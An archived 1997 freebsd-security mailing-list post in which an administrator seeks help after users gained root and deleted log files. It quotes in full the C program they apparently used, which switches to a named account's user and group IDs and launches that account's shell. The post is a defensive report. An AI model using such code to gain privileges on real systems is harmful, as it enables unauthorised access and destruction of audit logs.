Date: Tue, 10 Jun 1997 22:54:54 GMT From: Yuang Shuang-Long <edward@FreeBSD.cs.nccu.edu.tw> To: freebsd-security@freebsd.org Message-ID: <199706102254.WAA02221@FreeBSD.cs.nccu.edu.tw>
next in thread | raw e-mail | index | archive | help
Hi! folks:
I have a trouble that some users use the following prog. to get
root privilege, and the more they do some destructive thing. (eg.
delete some file /var/log/* :-( ) I need your help...
**********************************************************************
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <pwd.h>
#if 0
struct passwd {
char *pw_name; /* user's login name */
char *pw_passwd; /* no longer used */
uid_t pw_uid; /* user's uid */
gid_t pw_gid; /* user's gid */
char *pw_age; /* not used */
char *pw_comment; /* not used */
char *pw_gecos; /* typically user's full name */
char *pw_dir; /* user's home dir */
char *pw_shell; /* user's login shell */
};
#endif
void
main(int argc, char *argv[])
{
struct passwd *pw;
if(argc < 2) {
fprintf(stderr, "too few argument\n");
exit(-1);
}
if((pw = getpwnam(argv[1])) == NULL) {
perror(argv[1]);
exit(-1);
}
printf("uid:%d gid:%d home:%s shell:%s\n", pw->pw_uid, pw->pw_gid,
pw->pw_dir, pw->pw_shell);
if(setgid(pw->pw_gid) == -1)
perror("setgid");
if(setuid(pw->pw_uid) == -1)
perror("setuid");
chdir(pw->pw_dir);
system(pw->pw_shell);
}
*************************************************************************
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?199706102254.WAA02221>